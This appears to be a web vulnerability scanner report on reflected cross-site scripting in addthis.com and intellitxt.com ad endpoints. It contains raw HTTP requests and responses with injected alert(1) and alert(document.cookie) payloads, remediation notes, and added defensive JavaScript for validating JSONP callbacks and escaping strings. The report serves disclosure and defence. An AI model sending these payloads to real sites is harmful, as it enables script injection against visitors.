GET /red/psi/sites/www.politicsdaily.com/p.json?callback=_ate.ad.hpr49eb5<script>alert(1)</script>c7ecb15712e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.politicsdaily.com%2F%3F12b75&ref=http%3A%2F%2Fburp%2Fshow%2F54&j0hyy0 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 287 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 20:54:00 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 20:54:00 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025640.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 15:18:51 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 06 Feb 2011 20:54:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:54:00 GMT Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b6498%3balert(1)//8fbb8eb7701 was submitted in the jscallback parameter. This input was echoed as b6498;alert(1)//8fbb8eb7701 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110206203844&adid=0%2C126828&cc=us&di=29608951%2C29848200&hk=1&ipid=10231&mh=e096018077ddee628d1f0595aa706535&pid=2%2C2&pvm=21312d264a07f4ba843782fa6a49ed66&pvu=24D1B162B3D74248ACE40AC0B07FDF87&rcc=us&so=0&syid=0%2C0&uf=0%2C0&ur=0%2C0&kp=0%2C0%3B186%2C578%3B&prf=ll%3A670%7Cintl%3A889%7Cpreprochrome%3A3%7Cgetconchrome%3A58%7Ccontint%3A112%7Ccontl%3A1064%7Cadvint%3A118%7Cadvl%3A1183%7Ctl%3A1393&jscallback=$iTXT.js.callback4b6498%3balert(1)//8fbb8eb7701 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/javascript Content-Length: 65 Date: Sun, 06 Feb 2011 20:37:47 GMT Connection: close
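The remediation advice above cannot be applied literally to a JSONP endpoint: the callback name has to be echoed into the script body, or the endpoint does not work. What can be done is to constrain it so tightly that no attacker text survives. The following is an added example, not code from addthis.com or intellitxt.com; the legitimate callback names and the payloads are the ones from the requests on this page, the data object is constructed, and jsonpResponse() and its return shape are assumptions.

```javascript
// Added example, not code from addthis.com or intellitxt.com: strict
// validation of a JSONP callback name before it is written into a script body.

// A callback may only be a dotted chain of JavaScript identifiers. Anything
// else (';', '(', '//', '<', whitespace, quotes) is rejected, so no attacker
// text ever reaches the response.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// Build the JSONP response, or return null so the caller can answer 400.
function jsonpResponse(callback, data) {
  if (!isValidCallback(callback)) return null;
  // JSON.stringify already yields valid JavaScript; the extra escapes keep the
  // body harmless if it is ever embedded in HTML, and stop U+2028/U+2029 from
  // acting as line terminators inside the literal.
  const json = JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return {
    headers: {
      // A script content type plus nosniff stops the body being treated as HTML.
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    // The leading comment keeps the callback name from being the first bytes of
    // the response, a common defence against content-sniffing tricks.
    body: `/**/${callback}(${json});`,
  };
}
```

The pattern deliberately accepts `$iTXT.js.callback4` and `_ate.ad.hpr49eb5`, the shapes the real clients on this page send, while rejecting both scanner payloads: the `;alert(1)//` suffix and the `<script>` tag fail the identifier grammar before any string building happens.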
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1da7"><script>alert(1)</script>24a46bbb395 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2784%2C329%2C2776%2C4004%26type%3Dscript%26ipid%3D10231%26sfid%3D0e1da7"><script>alert(1)</script>24a46bbb395 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 204 Date: Sun, 06 Feb 2011 20:37:40 GMT Connection: close
1.99. http://electronista.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://electronista.us.intellitxt.com
Path: /intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e22c2'-alert(1)-'8d2186b5fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:36:58 GMT Connection: close Content-Length: 10716
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... qoptions={tags:"889.5259.10231"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://electronista.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1c7b2%3balert(1)//fc98b5440bb was submitted in the jscallback parameter. This input was echoed as 1c7b2;alert(1)//fc98b5440bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1297024724535&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&jscallback=$iTXT.js.callback31c7b2%3balert(1)//fc98b5440bb HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:42 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:37:41 GMT Connection: close Content-Length: 4915
(function(){var nh = new $iTXT.ui.Hook({value: "iphone",uid: "681C2C358D4E49A28512ECFA3DED1626",uidh: "5b94fa4e6337160336acb19c5caaf7ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl. ...[SNIP]... XT.glob.track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19827374,'iphone','http://pixel.intellitxt.com/pixel.jsp?id=2776&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback31c7b2;alert(1)//fc98b5440bb();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e242d%3balert(1)//f9ad150e83d was submitted in the jscallback parameter. This input was echoed as e242d;alert(1)//f9ad150e83d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1297024724423&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&pagecl=18113&jsoncl=1262&ppc=-1&hn=7&chunkkey=10231:e096018077ddee628d1f0595aa706535:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22We%20have%20noticed%20that%20you%20are%20using%20iPhone%20for%20browsing%20our%20website.%20Would%20you%20like%20to%20browse%20our%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22Toshiba%20has%20sold%20about%20half%20of%20what%20it%20expected%20to%20of%20its%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22in%20Japan%2C%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22Masaaki%20Osumi%2C%20the%20president%20of%20Toshiba%25E2%2580%2599s%20Visual%20Products%20Company.%20Only%20500%20of%20the%2020-inch%2C%20%242%2C490%20set%20were%20sold%20in%20the%20first%20month%20and%20even%20less%20of%20the%20less%20expensive%2012-inch%20model.%20Toshiba%20expected%20to%20move%201%2C000%20of%20each%20model%20during%20their%20first%20month%20of%20sales.%22%7D%5D%7D%2C%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A5%2Cc%3A%22Osumi%20continued%2C%20saying%20the%20company%20needs%20to%20offer%20larger%20sizes%20of%20the%20sets%20in%20order%20to%20boost%20sales.%20Technical%20challenges%20need%20to%20be%20overcome%20first%2C%20however%2C%20before%20the%20company%20can%20do%20so%20in%20the%20second%20half%20of%20the%20year.%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A6%2Cc%3A%22To%20creat&chunk=0&total=2&jscallback=$iTXT.js.callback1e242d%3balert(1)//f9ad150e83d HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Sun, 06 Feb 2011 20:37:42 GMT Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea68b%3balert(1)//0780825101d was submitted in the jscallback parameter. This input was echoed as ea68b;alert(1)//0780825101d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0ea68b%3balert(1)//0780825101d HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:37:43 GMT Content-Length: 11484
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0ea68b;alert(1)//0780825101d({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
1.103. http://electronista.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://electronista.us.intellitxt.com
Path: /v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbb8"-alert(1)-"b15924c4453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. Note that in this response the reflected string is a property name inside an object literal (the application escapes = as \u003d but leaves the double quote alone), so the quote-minus-alert payload turns the statement into a syntax error rather than executing; a working exploit for this particular location needs a payload that keeps the object literal well-formed. The unfiltered reflection of the quote character is what the scanner confirms.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0&fbbb8"-alert(1)-"b15924c4453=1 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:37:43 GMT Content-Length: 11465
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... k0","reg":"tx","refurl":"http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889\u003d1","fbbb8"-alert(1)-"b15924c4453":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');} ...[SNIP]...
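The single-quoted pageQuery assignment in the front.asp response above and the double-quoted parameter map in the /v4/init response show two ways request data ends up inside a JavaScript string literal in a script response. As an added example (not the intellitxt or engadget server code; the query strings and payloads are the ones from the requests on this page, while the $iTXT object shape, the function names and the harness are assumptions), here are both constructions beside hardened versions, with a small harness that runs each response line with alert() stubbed so the difference is observable:

```javascript
// Added example: placing request data inside a JavaScript string literal in a
// script response. Not the intellitxt or engadget server code; the $iTXT object
// shape is an assumption.

// Escape every character that could terminate a JS string literal (either
// quote style), end an enclosing <script> block, or break the line, as \uXXXX.
function jsStringEscape(value) {
  return String(value).replace(/[\\"'<>\/\u2028\u2029\r\n]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Vulnerable pattern seen in the front.asp response: the raw query string is
// dropped between single quotes.
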